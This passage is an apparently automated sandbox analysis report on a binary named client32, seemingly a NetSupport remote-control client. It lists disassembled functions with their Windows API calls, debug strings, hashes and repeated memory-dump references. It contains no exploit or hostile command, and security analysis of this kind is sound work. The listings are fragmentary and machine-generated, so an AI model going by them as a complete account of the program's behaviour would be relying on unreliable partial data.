                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                    • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                    • API String ID: 863766397-389219706
                                                                                                                                                    • Opcode ID: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                                                                                    • Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
                                                                                                                                                    • Opcode Fuzzy Hash: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
                                                                                                                                                    • Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1
                                                                                                                                                    Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                                                                                    • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                                                                                    • API String ID: 2735369351-763374134
                                                                                                                                                    • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                                                                                    • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                                                                                                    • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                                                                                    • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                                                                                                    Function 110056A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 110056DD
                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 110056E8
                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
                                                                                                                                                    • EndPaint.USER32(?,?), ref: 1100572F
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • m_hWnd, xrefs: 110056C8
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 1216912278-2830328467
                                                                                                                                                    • Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                                                                                    • Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
                                                                                                                                                    • Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
                                                                                                                                                    • Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764
                                                                                                                                                    Function 110B94B0 Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32(76967AA0,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B94C7
                                                                                                                                                    • GetCursorPos.USER32(110C032C), ref: 110B94D6
                                                                                                                                                      • Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC
                                                                                                                                                    • PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
                                                                                                                                                    • ClientToScreen.USER32(?,110C032C), ref: 110B9516
                                                                                                                                                    • SetCursorPos.USER32(110C032C,110C032C,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9524
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 110B9531
                                                                                                                                                    • SetCursor.USER32(00000000,?,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C,110C032C), ref: 110B9538
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3235510773-0
                                                                                                                                                    • Opcode ID: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                                                                                    • Instruction ID: e413c7048e2c9fc99527a8bfd6ed1c185ebac442807b3b09d80bd78fd45dd6ba
                                                                                                                                                    • Opcode Fuzzy Hash: 8d2b5613eb67d591a4703b81c38f404f3807f5f87d52da527a803e22d8ab7870
                                                                                                                                                    • Instruction Fuzzy Hash: A8115B72A4020E9BDB18DFA4C984DAFF7BCFB48215B004569E52297644DB34E906CBA4
                                                                                                                                                    Function 11139960 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedDecrement.KERNEL32(111F1BC0), ref: 111399AD
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • UI.CPP, xrefs: 111399BD
                                                                                                                                                    • De-Inited VolumeControl Subsystem (Ref's Outstanding!)..., xrefs: 111399CF
                                                                                                                                                    • "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value), xrefs: 111399C2
                                                                                                                                                    • De-Inited VolumeControl Subsystem (OK: 0 ref's)..., xrefs: 11139A10
                                                                                                                                                    • De-Initing VolumeControl Subsystem..., xrefs: 11139994
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DecrementErrorExitInterlockedLastMessageProcesswsprintf
                                                                                                                                                    • String ID: "Unpaired VolumeControlInstanceRelease() call" && (-1 != new_value)$De-Inited VolumeControl Subsystem (OK: 0 ref's)...$De-Inited VolumeControl Subsystem (Ref's Outstanding!)...$De-Initing VolumeControl Subsystem...$UI.CPP
                                                                                                                                                    • API String ID: 1808733558-973815363
                                                                                                                                                    • Opcode ID: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
                                                                                                                                                    • Instruction ID: d06095d957dcd957f3f08007483117ab829c543eb00cd4bea9fc0d92cb8d829e
                                                                                                                                                    • Opcode Fuzzy Hash: 5f7036c21c148ea7cf9c645d1c387948bc2d884219579e1534bdf6d07b7a67db
                                                                                                                                                    • Instruction Fuzzy Hash: 74014979E0955EF7CA00ABF59D41F8AF769DB4163DF100A26E829D2A80FB3561004795
                                                                                                                                                    Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                                                                                      • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                                                                                      • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                                                                                      • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                                                                                      • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                                                                                      • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                                                                                    • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                                                                                    • _free.LIBCMT ref: 1100B3C8
                                                                                                                                                    • _free.LIBCMT ref: 1100B3CE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 705253285-0
                                                                                                                                                    • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                                                    • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                                                                                    • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                                                    • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                                                                                    Function 11079270 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                                                                                                    • API String ID: 2776021309-3012761530
                                                                                                                                                    • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                                                                                    • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                                                                                                    • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                                                                                                    • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                                                                                                    Function 1101D660 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1101D66E
                                                                                                                                                    • LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
                                                                                                                                                    • RegisterClassExA.USER32(00000030), ref: 1101D6F1
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1101D6F7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 430917334-4108050209
                                                                                                                                                    • Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                                                                                    • Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
                                                                                                                                                    • Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                                                                                    • Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99
                                                                                                                                                    Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
